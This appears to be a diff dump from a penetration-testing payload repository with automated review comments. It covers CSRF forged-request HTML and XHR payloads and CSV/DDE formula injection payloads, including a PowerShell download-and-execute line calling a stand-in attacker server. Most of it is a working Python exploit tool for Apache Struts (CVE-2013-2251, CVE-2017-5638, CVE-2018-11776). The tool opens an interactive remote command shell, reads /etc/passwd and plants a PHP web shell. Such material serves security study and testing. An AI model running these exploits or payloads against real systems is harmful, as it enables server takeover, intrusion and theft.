* https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets
* https://digi.ninja/projects/bucket_finder.php
* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792) * [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)
* [FlAWS.cloud Challenge based on AWS vulnerabilities](http://flaws.cloud/) * [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
* [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/)
* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
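Review bot: `git clone git@github.com:andresriancho/enumerate-iam.git` uses the SSH transport, which fails for readers without a GitHub SSH key configured; the HTTPS URL `https://github.com/andresriancho/enumerate-iam.git` works for anonymous clones. The pasted output is long; trimming it to the first `[INFO]` line and two or three `worked!` lines would keep the focus on the invocation. The `Thanks to` link `https://digi.ninja/projects/bucket_finder.php` was dropped from References while Bucket Finder is still listed under Tools with only the bare `https://digi.ninja/` URL; keep the project page link. The fence is again `powershell` for a bash session.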

BOOKS.md Normal file

@@ -0,0 +1,22 @@
# Book's list
Grab a book and relax, these ones are the best security books (in my opinion).
- [Web Hacking 101](https://leanpub.com/web-hacking-101)
- [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
- [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
- [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
- [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
- [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
- [The Mobile Application Hackers Handbook](http://amzn.to/2cVOIrE)
- [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
- [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
- [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
- [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
- [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
- [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
- [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
- [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
- [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
- [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
- [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
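Review bot: `The Mobile Application Hackers Handbook` appears twice, once with the `amzn.to` link and once as "by Dominic Chell et al., 2015" with the Wiley link; keep one entry, preferably the Wiley one, which names author and year like its neighbours. `Book's list` should be `Book list` or `Books` (no possessive), the `amzn.to` and `a.co` shortened links hide their destination and should point at the publisher's page, and several titles drop the apostrophe in "Hacker's" (`The Shellcoders Handbook`, `iOS Hackers Handbook`, `Android Hackers Handbook`, `The Browser Hackers Handbook`) while others keep it.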


@@ -95,7 +95,7 @@ Remainder:
* %E5%98%BE = %3E = \u563e (>) * %E5%98%BE = %3E = \u563e (>)
* %E5%98%BC = %3C = \u563c (<) * %E5%98%BC = %3C = \u563c (<)
## Thanks to ## References
* https://www.owasp.org/index.php/CRLF_Injection * https://www.owasp.org/index.php/CRLF_Injection
* https://vulners.com/hackerone/H1:192749 * https://vulners.com/hackerone/H1:192749

Binary file not shown.
After: Width | Height | Size: 393 KiB

CSRF Injection/README.md Normal file

@@ -0,0 +1,117 @@
# Cross-Site Request Forgery
> Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP
## Summary
* [Methodology](#methodology)
* [Payloads](#payloads)
* [HTML GET - Requiring User Interaction](#)
* [HTML GET - No User Interaction)](#)
* [HTML POST - Requiring User Interaction](#)
* [HTML POST - AutoSubmit - No User Interaction](#)
* [JSON GET - Simple Request](#)
* [JSON POST - Simple Request](#)
* [JSON POST - Complex Request](#)
## Tools
* [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe)
## Methodology
![CSRF_cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/Images/CSRF-CheatSheet.png?raw=true)
## Payloads
When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it.
### HTML GET - Requiring User Interaction
```html
<a href="http://www.example.com/api/setusername?username=CSRFd">Click Me</a>
```
### HTML GET - No User Interaction
```html
<img src="http://www.example.com/api/setusername?username=CSRFd">
```
### HTML POST - Requiring User Interaction
```html
<form action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
<input name="username" type="hidden" value="CSRFd" />
<input type="submit" value="Submit Request" />
</form>
```
### HTML POST - AutoSubmit - No User Interaction
```html
<form id="autosubmit" action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
<input name="username" type="hidden" value="CSRFd" />
<input type="submit" value="Submit Request" />
</form>
<script>
document.getElementById("autosubmit").submit();
</script>
```
### JSON GET - Simple Request
```html
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://www.example.com/api/currentuser");
xhr.send();
</script>
```
### JSON POST - Simple Request
```html
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://www.example.com/api/setrole");
//application/json is not allowed in a simple request. text/plain is the default
xhr.setRequestHeader("Content-Type", "text/plain");
//You will probably want to also try one or both of these
//xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
//xhr.setRequestHeader("Content-Type", "multipart/form-data");
xhr.send('{"role":admin}');
</script>
```
### JSON POST - Complex Request
```html
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://www.example.com/api/setrole");
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhr.send('{"role":admin}');
</script>
```
## References
- [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
- [Cross-Site Request Forgery (CSRF) - OWASP](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
- [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton](https://whitton.io/articles/messenger-site-wide-csrf/)
- [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/)
- [Hacking PayPal Accounts with one click (Patched) - Yasser Ali](http://yasserali.com/hacking-paypal-accounts-with-one-click/)
- [Add tweet to collection CSRF - vijay kumar](https://hackerone.com/reports/100820)
- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/)
- [How i Hacked your Beats account ? Apple Bug Bounty - @aaditya_purani](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/)
- [FORM POST JSON: JSON CSRF on POST Heartbeats API - Dr.Jones](https://hackerone.com/reports/245346)
- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
- [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
- [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0)
- [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](#https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
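Review bot: the two XMLHttpRequest examples under `JSON GET - Simple Request` and `JSON POST - Simple Request` never set `xhr.withCredentials = true`, so a cross-origin browser will not attach the victim's session cookie and the forged request arrives unauthenticated, which defeats the point made in the paragraph above about the cookie being sent along; only the `Complex Request` variant sets it, and that one sends `Content-Type: application/json;charset=UTF-8`, which triggers a CORS preflight that the browser only follows with the real POST if the target answers with `Access-Control-Allow-Origin` for the attacker's origin and `Access-Control-Allow-Credentials: true`, a caveat the section should state next to the snippet. Smaller points: the body `'{"role":admin}'` is not valid JSON (`admin` is unquoted), so a real endpoint would reject it before any role change; the `JSON GET` example is not a state-changing request and its response cannot be read cross-origin, so it does not demonstrate CSRF as the OWASP quotation at the top defines it; in the Summary every entry links to `#`, the `HTML GET - No User Interaction)` entry has a stray closing parenthesis, and the last reference is written as `(#https://medium.com/...)`, so it resolves to a page fragment instead of the URL.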

48
CSV Injection/README.md Normal file

@@ -0,0 +1,48 @@
# CSV Injection (Formula Injection)
Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
## Exploit
Basic exploit with Dynamic Data Exchange
```powershell
# pop a calc
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
=2+5+cmd|' /C calc'!A0
# pop a notepad
=cmd|' /C notepad'!'A1'
# powershell download and execute
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
# msf smb delivery with rundll32
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
```
Technical Details of the above payload:
- `cmd` is the name the server can respond to whenever a client is trying to access the server
- `/C` calc is the file name which in our case is the calc(i.e the calc.exe)
- `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data
Any formula can be started with
```powershell
=
+
@
```
## References
* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
* [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/)
* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)
* [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf)
* [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html)
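Review bot: the `Technical Details` bullets describe the DDE payload incorrectly: `cmd|' /C calc'!A0` follows the `application|topic!item` form, so `cmd` is the DDE application Excel launches, `' /C calc'` is the topic (the command line handed to it) and `A0` is the item; `/C calc` is not "the file name", and `cmd` is not "the name the server can respond to". Other points in the same block: the first line `DDE ("cmd";"/C calc";"!A0")A0` lacks the leading `=` every other payload has and uses the `;` argument separator of LibreOffice rather than Excel, which is worth saying since the heading only says "Dynamic Data Exchange"; the download-and-execute line feeds `wget attacker_server/shell.exe` to `IEX`, which evaluates text as PowerShell, so the served file has to be a script, not an `.exe`; the `Any formula can be started with` list omits `-` (Excel evaluates a cell starting with `-` as a formula too); and the fence is tagged `powershell` although the content is spreadsheet formulas. The README also gives no mitigation at all; one sentence on prefixing any cell that starts with `=`, `+`, `-` or `@` with a `'` and escaping embedded `"`, `,` and newlines would complete it.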


@@ -1,32 +0,0 @@
# CSV Excel formula injection
Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
## Exploit
Basic exploit with Dynamic Data Exchange
```powershell
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
```
Technical Details of the above payload:
cmd is the name the server can respond to whenever a client is trying to access the server
/C calc is the file name which in our case is the calc(i.e the calc.exe)
!A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data
Any formula can be started with
```powershell
=
+
@
```
## Thanks to
* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)


@@ -1,13 +1,18 @@
#!/usr/bin/python #!/usr/bin/python
import urllib2 from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import input
from builtins import str
import urllib.request, urllib.error, urllib.parse
import time import time
import sys import sys
import os import os
import commands import subprocess
import requests import requests
import readline import readline
import urlparse import urllib.parse
RED = '\033[1;31m' RED = '\033[1;31m'
BLUE = '\033[94m' BLUE = '\033[94m'
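Review bot: `from future import standard_library`, `standard_library.install_aliases()` and the two `from builtins import ...` lines pull in the third-party `future` package, which is not part of the standard library on either Python version and is not declared anywhere in this change, so the converted script now fails at import time without `pip install future`. Since the same hunk already rewrites the imports to `urllib.request, urllib.error, urllib.parse` and `subprocess`, those four lines add nothing on Python 3 and can be dropped outright; the trailing `import urllib.parse` on the last line of the hunk is also a duplicate of what the combined import line already brings in. If `commands` was only used for `getoutput`, check that the `subprocess` replacement is actually called further down, otherwise it is a dead import.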
@@ -32,179 +37,179 @@ logo = BLUE+'''
=[ Command Execution v3]= =[ Command Execution v3]=
By @s1kr10s By @s1kr10s
'''+ENDC '''+ENDC
print logo print(logo)
print " * Ejemplo: http(s)://www.victima.com/files.login\n" print(" * Ejemplo: http(s)://www.victima.com/files.login\n")
host = raw_input(BOLD+" [+] HOST: "+ENDC) host = input(BOLD+" [+] HOST: "+ENDC)
if len(host) > 0: if len(host) > 0:
if host.find("https://") != -1 or host.find("http://") != -1: if host.find("https://") != -1 or host.find("http://") != -1:
poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}" poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}"
def exploit(comando): def exploit(comando):
exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
return exploit return exploit
def exploit2(comando): def exploit2(comando):
exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}" exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
return exploit2 return exploit2
def exploit3(comando): def exploit3(comando):
exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D" exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
return exploit3 return exploit3
def pwnd(shellfile): def pwnd(shellfile):
exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
return exploitfile return exploitfile
def validador(): def validador():
arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"] arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"]
return arr_lin_win return arr_lin_win
#def reversepl(ip,port): #def reversepl(ip,port):
# print "perl" # print "perl"
#def reversepy(ip,port): #def reversepy(ip,port):
# print "python" # print "python"
# CVE-2013-2251 --------------------------------------------------------------------------------- # CVE-2013-2251 ---------------------------------------------------------------------------------
try: try:
response = '' response = ''
response = urllib2.urlopen(host+poc) response = urllib.request.urlopen(host+poc)
except: except:
print RED+" Servidor no responde\n"+ENDC print(RED+" Servidor no responde\n"+ENDC)
exit(0) exit(0)
print BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC print(BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC)
if response.read().find("mamalo") != -1: if response.read().find("mamalo") != -1:
print RED+" [-] VULNERABLE"+ENDC print(RED+" [-] VULNERABLE"+ENDC)
owned = open('vulnsite.txt', 'a') owned = open('vulnsite.txt', 'a')
owned.write(str(host)+'\n') owned.write(str(host)+'\n')
owned.close() owned.close()
opcion = raw_input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
#print BOLD+" * [SHELL REVERSA]"+ENDC #print BOLD+" * [SHELL REVERSA]"+ENDC
#print OTRO+" Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC #print OTRO+" Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC
if opcion == 's': if opcion == 's':
print YELLOW+" [-] GET PROMPT...\n"+ENDC print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
time.sleep(1) time.sleep(1)
print BOLD+" * [UPLOAD SHELL]"+ENDC print(BOLD+" * [UPLOAD SHELL]"+ENDC)
print OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC)
while 1: while 1:
separador = raw_input(GREEN+"Struts2@Shell_1:$ "+ENDC) separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC)
espacio = separador.split(' ') espacio = separador.split(' ')
comando = "','".join(espacio) comando = "','".join(espacio)
if espacio[0] != 'reverse' and espacio[0] != 'pwnd': if espacio[0] != 'reverse' and espacio[0] != 'pwnd':
shell = urllib2.urlopen(host+exploit("'"+str(comando)+"'")) shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'"))
print "\n"+shell.read() print("\n"+shell.read())
elif espacio[0] == 'pwnd': elif espacio[0] == 'pwnd':
pathsave=raw_input("path EJ:/tmp/: ") pathsave=input("path EJ:/tmp/: ")
if espacio[1] == 'php': if espacio[1] == 'php':
shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'""" shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'"""
urllib2.urlopen(host+pwnd(str(shellfile))) urllib.request.urlopen(host+pwnd(str(shellfile)))
shell = urllib2.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'")) shell = urllib.request.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'"))
if shell.read().find(pathsave+"status.php") != -1: if shell.read().find(pathsave+"status.php") != -1:
print BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC print(BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC)
else: else:
print BOLD+RED+"\nNo Create File :/\n"+ENDC print(BOLD+RED+"\nNo Create File :/\n"+ENDC)
# CVE-2017-5638 --------------------------------------------------------------------------------- # CVE-2017-5638 ---------------------------------------------------------------------------------
print BLUE+" [-] NO VULNERABLE"+ENDC print(BLUE+" [-] NO VULNERABLE"+ENDC)
print BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC)
x = 0 x = 0
while x < len(validador()): while x < len(validador()):
valida = validador()[x] valida = validador()[x]
try: try:
req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))}) req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))})
result = urllib2.urlopen(req).read() result = urllib.request.urlopen(req).read()
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
print RED+" [-] VULNERABLE"+ENDC print(RED+" [-] VULNERABLE"+ENDC)
owned = open('vulnsite.txt', 'a') owned = open('vulnsite.txt', 'a')
owned.write(str(host)+'\n') owned.write(str(host)+'\n')
owned.close() owned.close()
opcion = raw_input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
if opcion == 's': if opcion == 's':
print YELLOW+" [-] GET PROMPT...\n"+ENDC print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
time.sleep(1) time.sleep(1)
while 1: while 1:
try: try:
separador = raw_input(GREEN+"\nStruts2@Shell_2:$ "+ENDC) separador = input(GREEN+"\nStruts2@Shell_2:$ "+ENDC)
req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))}) req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))})
result = urllib2.urlopen(req).read() result = urllib.request.urlopen(req).read()
print "\n"+result print("\n"+result)
except: except:
exit(0) exit(0)
else: else:
x = len(validador()) x = len(validador())
else: else:
print BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x) print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
except: except:
pass pass
x=x+1 x=x+1
# CVE-2018-11776 --------------------------------------------------------------------------------- # CVE-2018-11776 ---------------------------------------------------------------------------------
print BLUE+" [-] NO VULNERABLE"+ENDC print(BLUE+" [-] NO VULNERABLE"+ENDC)
print BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC)
x = 0 x = 0
while x < len(validador()): while x < len(validador()):
#Filtramos la url solo dominio #Filtramos la url solo dominio
url = host.replace('#', '%23') url = host.replace('#', '%23')
url = host.replace(' ', '%20') url = host.replace(' ', '%20')
if ('://' not in url): if ('://' not in url):
url = str("http://") + str(url) url = str("http://") + str(url)
scheme = urlparse.urlparse(url).scheme scheme = urllib.parse.urlparse(url).scheme
site = scheme + '://' + urlparse.urlparse(url).netloc site = scheme + '://' + urllib.parse.urlparse(url).netloc
#Filtramos la url solo path #Filtramos la url solo path
file_path = urlparse.urlparse(url).path file_path = urllib.parse.urlparse(url).path
if (file_path == ''): if (file_path == ''):
file_path = '/' file_path = '/'
valida = validador()[x] valida = validador()[x]
try: try:
result = requests.get(site+"/"+exploit3(str(valida))+file_path).text result = requests.get(site+"/"+exploit3(str(valida))+file_path).text
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
print RED+" [-] VULNERABLE"+ENDC print(RED+" [-] VULNERABLE"+ENDC)
owned = open('vulnsite.txt', 'a') owned = open('vulnsite.txt', 'a')
owned.write(str(host)+'\n') owned.write(str(host)+'\n')
owned.close() owned.close()
opcion = raw_input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
if opcion == 's': if opcion == 's':
print YELLOW+" [-] GET PROMPT...\n"+ENDC print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
time.sleep(1) time.sleep(1)
